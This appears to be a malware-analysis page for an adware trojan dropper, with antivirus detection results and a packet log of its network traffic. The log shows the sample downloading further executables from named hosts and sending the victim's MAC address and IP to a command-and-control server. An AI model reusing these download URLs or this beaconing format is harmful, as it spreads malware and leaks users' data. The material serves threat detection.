game_3481cn1.exe Malware Trojan Adware Downloader Dropper PPD Traffic Analysis PCAP file download

Download Attachments

  • 1 pcap game358
    Date added: October 26, 2016 5:32 am Added by: admin File size: 1 MB Downloads: 92
SHA256: 7548963754494b54a1d8b71b59e32c8b92b2e49c88dc90a3e299e45fe222dbd2
File name: game_3581cnl.exe
Detection ratio: 37 / 56
Analysis date: 2016-10-26 21:23:29 UTC ( 0 minutes ago )
AVware Trojan.Win32.Generic!BT 20161026
Ad-Aware Adware.GenericKD.3602650 20161026
AegisLab Troj.Generickd!c 20161026
AhnLab-V3 Adware/Win32.Agent.N2118869544 20161026
Antiy-AVL Trojan/Win32.PackedNsisMod.a 20161026
Arcabit Adware.Generic.D36F8DA 20161026
Avast Win32:Malware-gen 20161026
Avira (no cloud) APPL/Yantaia.sgj 20161026
Baidu Multi.Threats.InArchive 20161026
BitDefender Adware.GenericKD.3602650 20161026
CAT-QuickHeal Pua.Agent 20161026
ClamAV Win.Trojan.691128-1 20161026
Cyren W32/Trojan.AQCD-2701 20161026

2016-10-25 23:32:35.987961 IP 192.168.1.102.61091 > 115.238.246.174.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /game_3581cnl.exe HTTP/1.1
E..M..@……..fs……P……. P…fc..GET /game_3581cnl.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down2.869v.com
Connection: Keep-Alive

2016-10-25 23:32:36.113830 IP 192.168.1.102.53365 > 75.75.76.76.53: 941+ A? down2.869v.com. (32)
E..<    ……….fKKLL.u.5.(l…………..down2.869v.com…..

E..(D.@….i…f.4U….P.H%..x..P…

2016-10-25 23:34:59.949703 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [P.], seq 0:175, ack 1, win 64240, length 175: HTTP: GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
E…|.@……..fz.kC…P..%…..P…….GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: ht.sulang.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:35:00.157484 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [P.], seq 0:175, ack 1, win 64240, length 175: HTTP: GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
E…|.@……..fz.kC…P..%…..P…….GET /route.php?package=inter&class=status&function=getinfo HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: ht.sulang.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:35:00.349997 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [.], ack 1, win 64240, length 0
E..(|.@……..fz.kC…P..&}….P…(………
2016-10-25 23:35:00.350398 IP 192.168.1.102.61097 > 122.225.107.67.80: Flags [.], ack 233, win 64009, length 0
E..(|.@……..fz.kC…P..&}…pP..     (………

E..(|`@… ?…f…….P.k..p…P..<“[……..
2016-10-25 23:35:01.112744 IP 192.168.1.102.61098 > 14.18.142.16.80: Flags [P.], seq 0:139, ack 1, win 65340, length 139: HTTP: GET /73.212.156.169 HTTP/1.1
E…|a@……..f…….P.k..p…P..<….GET /73.212.156.169 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: freeapi.ipip.net
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:35:01.523366 IP 192.168.1.102.61098 > 14.18.142.16.80: Flags [.], ack 243, win 65098, length 0
E..(|b@… =…f…….P.k..p…P..J!………
2016-10-25 23:35:01.711142 IP 192.168.1.102.61099 > 122.225.107.67.80: Flags [S], seq 2577945320, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4|.@……..fz.kC…P..R……. ..P…………..

E..(}.@……..fz.kC…P..R…8.P…    ………
2016-10-25 23:35:02.115588 IP 192.168.1.102.61099 > 122.225.107.67.80: Flags [P.], seq 0:291, ack 1, win 256, length 291: HTTP: POST /route.php HTTP/1.1
E..K}.@….x…fz.kC…P..R…8.P…….POST /route.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ht.sulang.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache

package=inter&class=int_nsis&function=int&configname=xiaoxiong35&city=Y29tY2FzdC5jb20iXQ==

2016-10-25 23:35:45.867298 IP 192.168.1.102.61115 > 122.225.107.67.80: Flags [P.], seq 0:289, ack 1, win 256, length 289: HTTP: GET /route.php?package=count&class=limit_count&function=count&type=3&mac=00-0C-29-18-4A-91&ip=73.212.156.169&value=MSM0OSM5NiM2NSM5IzgyIzgjNiM3NQ==&hash=b0132f07a9b962b94213669bc1a96606 HTTP/1.1
E..I}.@….^…fz.kC…P……..P…P…GET /route.php?package=count&class=limit_count&function=count&type=3&mac=00-0C-29-18-4A-91&ip=73.212.156.169&value=MSM0OSM5NiM2NSM5IzgyIzgjNiM3NQ==&hash=b0132f07a9b962b94213669bc1a96606 HTTP/1.1
User-Agent: Mozi11a
Host: ht.sulang.com
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 23:36:06.278399 IP 192.168.1.102.61125 > 220.243.237.154.80: Flags [P.], seq 0:240, ack 1, win 256, length 240: HTTP: GET /ks3_f6b5da76dfb6764259f38c1ff7983a8c/48_48.ico HTTP/1.1
E…64@…7….f…….P…:..8EP….d..GET /ks3_f6b5da76dfb6764259f38c1ff7983a8c/48_48.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: img1.pcfg.cache.wps.cn
Connection: Keep-Alive

2016-10-25 23:36:07.016355 IP 192.168.1.102.60592 > 75.75.75.75.53: 62329+ A? iynus.net. (27)
E..7……._…fKKKK…5.#fu.y………..iynus.net…..
2016-10-25 23:36:07.897362 IP 192.168.1.102.61126 > 117.52.31.226.80: Flags [S], seq 4288073650, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

E..(K.@…X….fu4…..P……..P…<………
2016-10-25 23:36:08.149814 IP 192.168.1.102.61126 > 117.52.31.226.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /~test/09u8h76f/65fg67n HTTP/1.1
E..NK.@…V….fu4…..P……..P…%…GET /~test/09u8h76f/65fg67n HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: iynus.net
Connection: Keep-Alive

2016-10-25 23:36:09.664561 IP 192.168.1.102.61127 > 121.31.22.151.80: Flags [P.], seq 0:230, ack 1, win 256, length 230: HTTP: GET /cn/static/swf/gm/ldfhy_24953_2649111.exe HTTP/1.1
E…..@……..fy……P.V..(`.6P…^…GET /cn/static/swf/gm/ldfhy_24953_2649111.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: wd.shunfeigame.com
Connection: Keep-Alive

 

2016-10-25 23:36:16.400215 IP 192.168.1.102.61131 > 115.159.15.54.80: Flags [P.], seq 0:745, ack 1, win 258, length 745: HTTP: POST http://www.xy.com/lander/lanyuenew HTTP/1.1
E…F.@…l….fs..6…P.X1.3!H.P…j…POST http://www.xy.com/lander/lanyuenew HTTP/1.1
Host: www.xy.com
Connection: keep-alive
Content-Length: 413
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

adkey=24953&guid=FCEE48BA5BD741FDA82B04DC2745DDBB&agent_id=287&cplaceid=1088&installtime=2016-10-25&iswb=0&pprocess=game_3581cnl[1].exe&installparam=UnR4cDAmUTAnI1x7ZmF0eXlBfHhwMCZRMCcjRXRncHthRWd6dnBmZlt0eHAwJlEwJyNGcGFgZVt0eHAwJlEwJyNEXFEwJlEwJyNDcGdmfHp7MCZRMCcjWFRWMCZRJSUwJlQlVjAmVCcsMCZUJC0wJlQhVDAmVCwkMCcjXEUwJlEkLCcwJ1AkIy0wJ1AmJzAnUCQmJzAnI1pGMCZRWHx2Z3pmenNhPkJ8e3F6YmY+TUUwJyNcZlx7YXBne3BhV3RnMCZRJQ==

E..(F.@…n….fs..6…P….X..KP………….
2016-10-25 23:36:18.479703 IP 192.168.1.102.61132 > 115.159.15.54.80: Flags [P.], seq 0:361, ack 1, win 64240, length 361: HTTP: GET /lander/lanyuenew?adkey=24953&guid=FCEE48BA5BD741FDA82B04DC2745DDBB&agent_id=287&cplaceid=1088&installtime=2016-10-25&logintime=2016-10-25&runcount=0&iswb=0 HTTP/1.1
E…F.@…m….fs..6…P….X..KP…….GET /lander/lanyuenew?adkey=24953&guid=FCEE48BA5BD741FDA82B04DC2745DDBB&agent_id=287&cplaceid=1088&installtime=2016-10-25&logintime=2016-10-25&runcount=0&iswb=0 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: www.xy.com
Connection: Keep-Alive

2016-10-25 23:36:18.509832 IP 192.168.1.102.61133 > 115.231.153.8.80: Flags [S], seq 1441225526, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..47C@……..fs……PU.[6…… ……………..

E..(7D@……..fs……PU.[79-.JP…Z”……..
2016-10-25 23:36:18.819638 IP 192.168.1.102.61133 > 115.231.153.8.80: Flags [P.], seq 0:212, ack 1, win 256, length 212: HTTP: GET /YouXiHe/setup_yxs_kltj.exe HTTP/1.1
E…7E@……..fs……PU.[79-.JP…….GET /YouXiHe/setup_yxs_kltj.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Host: box64.uuuo.com
Connection: Keep-Alive

Share

Leave a Reply